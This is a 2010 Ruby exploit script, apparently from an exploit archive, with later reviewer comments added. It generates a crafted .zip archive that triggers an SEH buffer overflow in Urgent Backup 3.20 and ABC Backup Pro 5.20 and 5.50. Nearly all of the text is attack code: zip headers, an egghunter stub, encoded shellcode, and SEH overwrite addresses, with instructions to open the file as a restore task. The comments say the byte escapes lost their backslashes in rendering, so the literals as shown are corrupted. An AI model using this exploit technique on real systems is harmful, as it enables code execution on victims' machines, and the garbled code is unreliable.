
# Title : Urgent Backup 3.20 / ABC Backup Pro 5.20 / ABC Backup 5.50 (.zip) SEH
# Published : 2010-04-30
# Author : Lincoln


#!/usr/bin/ruby
# Software      : Urgent Backup 3.20 / ABC Backup Pro 5.20 / ABC Backup 5.50
# Author        : Lincoln
# Date          : April 27, 2010
# Reference     : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-034
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : SEH
# Greetz to     : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes.
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
#
# Flat script (no methods): writes one file, "Urgent1.zip" or "Urgent2.zip",
# chosen by the single numeric command-line option parsed below. The written
# data is three zip-record-shaped header strings wrapped around an entry name
# of `size` characters plus ".txt"; the two options differ only in which
# four-byte value (`seh` or `altseh`) is spliced into that name.
#
# NOTE(review): as rendered on this page every "\x" and "\n" escape has lost
# its backslash ("x50x4b", "|n", "1nn"), while other backslashes in the banner
# survived. The literals below are therefore plain ASCII text rather than the
# bytes the inline comments label, and the `length` arithmetic at `junk` and
# `rest` counts characters of that text, not bytes. The byte-level comments
# describe the author's intent, not what this page text would produce.
banner =
"|------------------------------------------------------------------|n" +
"|                         __               __                      |n" +
"|   _________  ________  / /___ _____     / /____  ____ _____ ___  |n" +
"|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |n" +
"| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |n" +
"| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |n" +
"|                                                                  |n" +
"|                                       http://www.corelan.be:8800 |n" +
"|                                                                  |n" +
"|-------------------------------------------------[ EIP Hunters ]--|n"


# Usage text whenever anything other than exactly one argument is given;
# exits before any file is touched.
unless ARGV.length == 1
        print banner
        puts "[+] Exploit for Urgent Backup 3.20 / ABC Backup Pro 5.20 / ABC Backup 5.50"
        puts "[+] Usage: select form the following:"
        puts "[+] 1). Urgent Backup 3.20 & ABC Backup Pro 5.20"
        puts "[+] 2). ABC Backup 5.50"
        puts "[+] ex: ./urgent.rb 1nn"
        exit
end

# Option number. String#to_i returns 0 for non-numeric input, which falls
# through to the final `else` branch at the bottom of the script.
var = ARGV[0].to_i

#Zip Headers
# The "PK" signature is x50x4b. header1 is shaped like a local-file header,
# header2 like a central-directory entry and header3 like the
# end-of-central-directory record. The xc4x09 fields (0x09c4 = 2500) look
# like the entry-name length and match opt1/opt2 below when `rest` is
# non-negative — TODO confirm against the zip spec; nothing in this script
# validates these fields, they are written verbatim.
header1=
"x50x4bx03x04x14x00x00x00" +
"x00x00xb7xacxcex34x00x00" +
"x00x00x00x00x00x00x00x00" +
"x00xc4x09x00x00x00"

header2=
"x50x4bx01x02x14x00x14x00" +
"x00x00x00x00xb7xacxcex34" +
"x00x00x00x00x00x00x00x00" +
"x00x00x00x00xc4x09x00x00" +
"x00x00x00x00x01x00x24x00" +
"x00x00x00x00x00x00"

header3=
"x50x4bx05x06x00x00x00x00" +
"x01x00x01x00xf2x09x00x00" +
"xe2x09x00x00x00x00"

#sub dx, 3000
# `egg` is a short stub (the author's comment above labels its first
# instruction). Within this script only its `length` is used, to size `junk`.
egg =
"x66x81xeaxb8x0bx42x52x6a" +
"x02x58xcdx2ex3cx05x5ax74" +
"xefxb8x77x30x30x74x8bxfa" +
"xafx75xeaxafx75xe7xffxe7"

#msgbox: "Exploited by Corelan Security Team"
# Payload string. The leading "w00tw00t" is an 8-character marker (presumably
# the tag the `egg` stub searches for — not verifiable from the text here);
# the remainder is the author's message-box payload written as hex escapes.
shellcode =
"w00tw00t" +
"x89xe3xdaxd7xd9x73xf4x59x49x49x49x49x49x49" +
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5a" +
"x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41" +
"x42x32x42x42x30x42x42x41x42x58x50x38x41x42" +
"x75x4ax49x4ax79x4ax4bx4dx4bx4bx69x51x64x45" +
"x74x4ax54x45x61x4ex32x4ex52x42x5ax46x51x49" +
"x59x42x44x4ex6bx51x61x44x70x4cx4bx43x46x44" +
"x4cx4ex6bx42x56x47x6cx4cx4bx51x56x44x48x4c" +
"x4bx51x6ex45x70x4ex6bx45x66x50x38x50x4fx47" +
"x68x50x75x4cx33x50x59x45x51x4bx61x4bx4fx48" +
"x61x51x70x4cx4bx50x6cx46x44x45x74x4cx4bx51" +
"x55x47x4cx4cx4bx50x54x43x35x50x78x43x31x4b" +
"x5ax4cx4bx42x6ax47x68x4ex6bx43x6ax47x50x45" +
"x51x4ax4bx48x63x46x57x50x49x4ex6bx44x74x4c" +
"x4bx45x51x4ax4ex44x71x49x6fx50x31x4bx70x4b" +
"x4cx4ex4cx4fx74x4bx70x43x44x46x6ax4ax61x4a" +
"x6fx44x4dx47x71x4bx77x48x69x4ax51x4bx4fx49" +
"x6fx49x6fx45x6bx43x4cx45x74x51x38x51x65x49" +
"x4ex4ex6bx42x7ax45x74x45x51x4ax4bx43x56x4e" +
"x6bx46x6cx42x6bx4cx4bx43x6ax45x4cx43x31x4a" +
"x4bx4ex6bx45x54x4ex6bx47x71x4dx38x4fx79x51" +
"x54x46x44x47x6cx45x31x4ax63x4fx42x44x48x46" +
"x49x48x54x4fx79x4bx55x4dx59x49x52x50x68x4c" +
"x4ex50x4ex44x4ex48x6cx50x52x4bx58x4dx4cx4b" +
"x4fx49x6fx4bx4fx4fx79x51x55x46x64x4dx6bx51" +
"x6ex49x48x4dx32x51x63x4cx47x45x4cx44x64x51" +
"x42x4dx38x4ex6bx49x6fx49x6fx4bx4fx4cx49x42" +
"x65x47x78x43x58x42x4cx50x6cx45x70x4bx4fx51" +
"x78x47x43x45x62x46x4ex45x34x45x38x51x65x51" +
"x63x45x35x44x32x4dx58x51x4cx44x64x44x4ax4c" +
"x49x48x66x43x66x4bx4fx43x65x46x64x4cx49x4b" +
"x72x50x50x4dx6bx4ex48x4cx62x50x4dx4dx6cx4e" +
"x67x47x6cx47x54x46x32x4bx58x43x6ex49x6fx49" +
"x6fx49x6fx42x48x51x74x45x71x51x48x45x70x43" +
"x58x44x30x43x47x42x4ex42x45x44x71x4bx6bx4b" +
"x38x43x6cx45x74x46x66x4bx39x48x63x45x38x50" +
"x61x42x4dx50x58x45x70x51x78x42x59x45x70x50" +
"x54x51x75x51x78x44x35x43x42x50x69x51x64x43" +
"x58x51x30x43x63x45x35x43x53x51x78x42x45x42" +
"x4cx50x61x50x6ex42x48x51x30x51x53x50x6fx50" +
"x72x45x38x43x54x51x30x50x62x43x49x51x78x42" +
"x4fx43x59x42x54x50x65x51x78x42x65x51x68x42" +
"x50x50x6cx46x51x48x49x4ex68x50x4cx46x44x45" +
"x72x4dx59x49x71x44x71x4ax72x43x62x43x63x50" +
"x51x46x32x4bx4fx48x50x50x31x4fx30x46x30x4b" +
"x4fx51x45x44x48x45x5ax41x41"

# `size` is the entry-name length before the ".txt" suffix. `junk` is filler
# sized so that junk + egg is exactly 276 (characters, as rendered here).
size = 2496
junk = "x90" * (276 - egg.length)

# Four-byte values placed directly after `egg`; the author's trailing notes
# give their intended role. `altseh` is the only difference between option 1
# and option 2.
nseh   = "x5cx61x98xa0" #pop esp / pop ad / jmp ecx
seh    = "x16x66x40x00" #universal p/p retn 8
altseh = "x7Ex6Bx6Bx00" #universal p/p retn 8 for ABC 5.50 regular

# The two payload variants differ solely in seh vs altseh, so they have the
# same length; `rest` below is computed from pay1 and reused for both.
pay1 = junk + egg + nseh + seh + shellcode
pay2 = junk + egg + nseh + altseh + shellcode

# Padding up to `size`. If pay1 is longer than `size` this is String#* with a
# negative count and raises ArgumentError; nothing guards against that.
rest = "D" * (size - pay1.length)

# Final entry names (payload + padding + the ".txt" extension the archive
# entry will carry).
opt1 = pay1 + rest + ".txt"
opt2 = pay2 + rest + ".txt"

# Option dispatch. Each branch first deletes the *other* option's output file
# (its own previous output is simply truncated by File.new with 'w'), then
# writes header1 + name + header2 + name + header3 and prints a summary.
# The `if ... then` form and the extra indentation of the write block are the
# author's formatting, left byte-identical.
if var == 1
        if File.exist?("Urgent2.zip") then
                File.delete("Urgent2.zip")
        end
                filename = "Urgent1.zip"
                f = File.new(filename, 'w')
                f.write header1 + opt1 + header2 + opt1 + header3
                f.close
                print banner
                puts "[+] Exploit for Option 1: Urgent Backup 3.20 & ABC Backup Pro 5.20"
                # Reports the entry-name length, not the size of the file just written.
                puts "[+] file size :  #{opt1.length}"
                # NOTE(review): "#(unknown)" is printed literally; it reads like an
                # archive-side substitution of an interpolated filename, so the
                # message no longer names the output file. Same on the option-2 branch.
                puts "[+] Wrote exploit file : #(unknown)"
                puts "[+] Run zip as restore task and boom!nn"
                exit

elsif var == 2
        if File.exist?("Urgent1.zip") then
                File.delete("Urgent1.zip")
        end
                filename = "Urgent2.zip"
                f = File.new(filename, 'w')
                f.write header1 + opt2 + header2 + opt2 + header3
                f.close
                print banner
                puts "[+] Exploit for Option 2: ABC Backup 5.50"
                # Reports the entry-name length, not the size of the file just written.
                puts "[+] file size :  #{opt2.length}"
                puts "[+] Wrote exploit file : #(unknown)"
                puts "[+] Run zip as restore task and boom!nn"
                exit

else
        # Reached for 0 (non-numeric input) and any number other than 1 or 2.
        puts "DOH!, read the instructions: ./urgent.rb"
end